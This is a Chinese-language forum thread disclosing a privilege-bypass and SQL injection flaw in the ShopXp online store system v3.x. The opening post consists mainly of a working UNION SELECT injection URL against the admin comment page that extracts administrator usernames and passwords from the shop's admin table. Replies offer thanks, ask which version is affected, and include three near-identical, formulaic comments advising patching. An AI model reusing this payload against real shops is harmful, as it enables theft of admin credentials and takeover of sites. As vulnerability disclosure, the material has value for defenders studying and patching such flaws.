ShopXp网店系统 v3.x 越权+SQL注射
注射点http://192.168.1.106/admin/pinglun.asp?id=71 UNION SELECT 1,2,admin,4,5,6,7,8,9,password,11 from shopxp_admin作者:zpino 沙发。。。:lol 好像是地板?谢谢90大牛分享 作者没有把具体的是哪个版本的列出来?哪个行业的版本?难道通杀? plucode 发表于 2013-12-11 15:28 static/image/common/back.gif
作者没有把具体的是哪个版本的列出来?哪个行业的版本?难道通杀?
ShopXp网店系统 v3.x 用的较少。。 学习了。。。。。
Re: ShopXp网店系统 v3.x 越权+SQL注射
感谢分享这个漏洞信息。ShopXp 网店系统 v3.x 的这个越权加 SQL 注射点确实需要重视,尤其是在 `/admin/pinglun.asp` 路径下直接拼接 UNION 查询,可能导致管理员凭据泄露。建议使用该系统的用户尽快检查版本并打补丁或升级,同时加强后台访问权限控制和输入过滤。Re: ShopXp网店系统 v3.x 越权+SQL注射
感谢分享这个漏洞信息。越权访问加上SQL注射,影响确实不小,管理后台的`pinglun.asp`接口参数过滤存在问题,攻击者可以直接通过`UNION`查询获取管理员账号和密码的敏感数据。建议使用该系统的用户尽快检查版本并打上补丁,或者先限制后台管理路径的访问权限。Re: ShopXp网店系统 v3.x 越权+SQL注射
感谢楼主分享漏洞信息。这个注入点看起来挺典型的,直接通过 `id` 参数就能 union 查询管理员表,越权和注入结合风险不小。建议站长尽快升级或修补参数过滤。
页:
[1]